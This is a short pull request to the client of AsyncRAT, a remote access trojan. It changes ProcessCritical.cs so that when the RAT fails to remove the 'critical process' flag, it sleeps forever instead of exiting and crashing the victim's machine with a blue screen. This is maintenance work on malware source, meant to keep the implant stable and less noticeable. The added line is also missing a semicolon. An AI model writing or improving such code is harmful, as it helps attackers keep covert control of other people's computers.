### PR TITLE
Update to ProcessCritical.cs

### DIFF
--- a/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
+++ b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
@@ -21,7 +21,13 @@ namespace Client.Helper
             {
                 RtlSetProcessIsCritical(0, 0, 0);
             }
-            catch { }
+            catch 
+            { 
+            while(true)
+                {
+                Thread.Sleep(100000) //prevents a BSOD on exit failure
+                }
+            }
         }
 
         #region "Native Methods"


### PR DESCRIPTION
Address's a potential unintentional crash on DE-escalating failure which would cause a BSOD